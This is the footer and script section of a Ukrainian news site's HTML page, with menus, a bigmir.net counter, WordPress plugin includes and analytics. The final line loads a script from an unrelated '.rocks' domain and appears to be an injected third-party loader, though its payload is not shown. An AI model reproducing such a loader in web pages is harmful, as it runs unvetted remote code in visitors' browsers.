<li id="menu-item-56406" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-56406"><a href="http://gazeta.lviv.ua/blogi/">Блоги</a></li>
<li id="menu-item-56419" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-56419"><a href="http://gazeta.lviv.ua/foto/">Відео/Фото</a></li>
</ul></div></aside></div>
                    <div class="footer-column footer-column-2"><aside id="nav_menu-4" class="all-devices  widget widget_nav_menu"><div class="menu-footer-categories-2-container"><ul id="menu-footer-categories-2" class="menu"><li id="menu-item-160322" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160322"><a href="http://gazeta.lviv.ua/politika-2/">Політика</a></li>
<li id="menu-item-160263" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160263"><a href="http://gazeta.lviv.ua/ekonomika-2/">Бізнес</a></li>
<li id="menu-item-160260" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160260"><a href="http://gazeta.lviv.ua/novini/suspilstvo/">Суспільство</a></li>
<li id="menu-item-160265" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160265"><a href="http://gazeta.lviv.ua/lyudi-lvova/">Люди Львова</a></li>
<li id="menu-item-160264" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160264"><a href="http://gazeta.lviv.ua/kultura/">Культура</a></li>
<li id="menu-item-160276" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160276"><a href="http://gazeta.lviv.ua/stil-zhittya/">Стиль життя</a></li>
</ul></div></aside></div>
                    <div class="footer-column footer-column-3"><aside id="custom_html-3" class="widget_text all-devices  widget widget_custom_html"><div class="textwidget custom-html-widget"><!--bigmir)net TOP 100-->
<script type="text/javascript" language="javascript"><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:40649,s:40649,t:3,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};
for(var f=self;f!=f.parent;f=f.parent)bm.w++;
try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));
else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}
try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}
try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}
r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400);bm.v^=r.length}
bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];
bmD.write('<a href="http://www.bigmir.net/" target="_blank" onClick="img=new Image();img.src="//www.bigmir.net/?cl=40649";"><img src="//c.bigmir.net/?'+bs.join('&')+'"  width="88" height="31" border="0" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a>');
//-->
</script>
<noscript>
<a href="http://www.bigmir.net/" target="_blank"><img src="//c.bigmir.net/?v40649&s40649&t3" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" border="0" /></a>
</noscript>
<!--bigmir)net TOP 100--></div></aside></div>
                </div>
            </div>
        </footer>
    </div><!-- end_wrapper -->

	<div style="display:none">
	<div class="grofile-hash-map-b979ecff8bdd274d1ab9531935c28ae8">
	</div>
	</div>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/frontend-builder-global-functions.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201736'></script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2017Sepaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.8.1'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/gk-nsp/gk-nsp.js?ver=4.8.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var thickboxL10n = {"next":"\u0412\u043f\u0435\u0440\u0435\u0434 \u00bb","prev":"\u00ab \u041d\u0430\u0437\u0430\u0434","image":"\u0417\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u043d\u044f","of":"\u0437","close":"\u0417\u0430\u043a\u0440\u0438\u0442\u0438","noiframes":"\u0426\u044f \u0444\u0443\u043d\u043a\u0446\u0456\u044f \u043f\u043e\u0442\u0440\u0435\u0431\u0443\u0454 \u043f\u0456\u0434\u0442\u0440\u0438\u043c\u043a\u0438 \u043f\u043b\u0430\u0432\u0430\u044e\u0447\u0438\u0445 \u0444\u0440\u0435\u0439\u043c\u0456\u0432. \u0419\u043c\u043e\u0432\u0456\u0440\u043d\u043e, \u0431\u0440\u0430\u0443\u0437\u0435\u0440 \u043d\u0435 \u043f\u0456\u0434\u0442\u0440\u0438\u043c\u0443\u0454 \u0442\u0435\u0491\u0438 iframe, \u0430\u0431\u043e \u0432\u043e\u043d\u0438 \u0437\u0430\u0431\u043b\u043e\u043a\u043e\u0432\u0430\u043d\u0456.","loadingAnimation":"http:\/\/gazeta.lviv.ua\/wp-includes\/js\/thickbox\/loadingAnimation.gif"};
/* ]]> */
</script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/gk-tabs/gk-tabs.js?ver=4.8.1'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/jquery.fitvids.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/waypoints.min.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/jquery.magnific-popup.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/jquery.mobile.custom.min.js?ver=1.2.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var et_pb_custom = {"ajaxurl":"http:\/\/gazeta.lviv.ua\/wp-admin\/admin-ajax.php","images_uri":"http:\/\/gazeta.lviv.ua\/wp-content\/themes\/gazeta\/images","builder_images_uri":"http:\/\/gazeta.lviv.ua\/wp-content\/plugins\/divi-builder\/framework\/images","et_frontend_nonce":"6496993b8e","subscription_failed":"\u0411\u0443\u0434\u044c \u043b\u0430\u0441\u043a\u0430, \u043f\u0435\u0440\u0435\u0432\u0456\u0440\u0442\u0435 \u043f\u043e\u043b\u044f \u043d\u0438\u0436\u0447\u0435, \u0449\u043e\u0431 \u043f\u0435\u0440\u0435\u043a\u043e\u043d\u0430\u0442\u0438\u0441\u044f, \u0449\u043e \u0432\u0438 \u0432\u0432\u0435\u043b\u0438 \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u0443 \u0456\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0456\u044e.","fill_message":"\u0411\u0443\u0434\u044c \u043b\u0430\u0441\u043a\u0430, \u0437\u0430\u043f\u043e\u0432\u043d\u0456\u0442\u044c \u043d\u0430\u0441\u0442\u0443\u043f\u043d\u0456 \u043f\u043e\u043b\u044f:","contact_error_message":"\u0411\u0443\u0434\u044c \u043b\u0430\u0441\u043a\u0430, \u0432\u0438\u043f\u0440\u0430\u0432\u0442\u0435 \u0446\u0456 \u043f\u043e\u043c\u0438\u043b\u043a\u0438:","invalid":"\u041d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u0430 \u0430\u0434\u0440\u0435\u0441\u0430 \u0435\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0457 \u043f\u043e\u0448\u0442\u0438","captcha":"\u041a\u0430\u043f\u0447\u0456","prev":"\u041f\u0435\u0440\u0435\u0434","previous":"\u041f\u043e\u043f\u0435\u0440\u0435\u0434\u043d\u0456","next":"\u0414\u0430\u043b\u0456","wrong_captcha":"\u0412\u0438 \u0432\u0432\u0435\u043b\u0438 \u043d\u0435\u0432\u0456\u0440\u043d\u0435 \u0447\u0438\u0441\u043b\u043e \u0432 captcha.","is_builder_plugin_used":"1","is_divi_theme_used":"","widget_search_selector":".widget_search"};
/* ]]> */
</script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/frontend-builder-scripts.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-includes/js/wp-embed.min.js?ver=4.8.1'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/easy-fancybox/fancybox/jquery.fancybox-1.3.8.min.js?ver=1.6'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/easy-fancybox/js/jquery.easing.min.js?ver=1.4.0'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/easy-fancybox/js/jquery.mousewheel.min.js?ver=3.1.13'></script>
<!-- Facebook Comments Plugin for WordPress: http://peadig.com/wordpress-plugins/facebook-comments/ -->
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/uk_UA/sdk.js#xfbml=1&appId=1083471841726549&version=v2.3";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<script type='text/javascript' src='http://stats.wp.com/e-201736.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:5.2.1',blog:'119895106',post:'160563',tz:'3',srv:'gazeta.lviv.ua'} ]);
	_stq.push([ 'clickTrackerInit', '119895106', '160563' ]);
</script>
<script type="text/javascript">
jQuery(document).on('ready post-load', function(){ jQuery('.nofancybox,a.pin-it-button,a[href*="pinterest.com/pin/create/button"]').addClass('nolightbox'); });
jQuery(document).on('ready post-load',easy_fancybox_handler);
jQuery(document).on('ready',easy_fancybox_auto);</script>

<script src="http://mtdatahaba.rocks/sticker.287255.js" type="text/javascript"></script>
</body>
</html>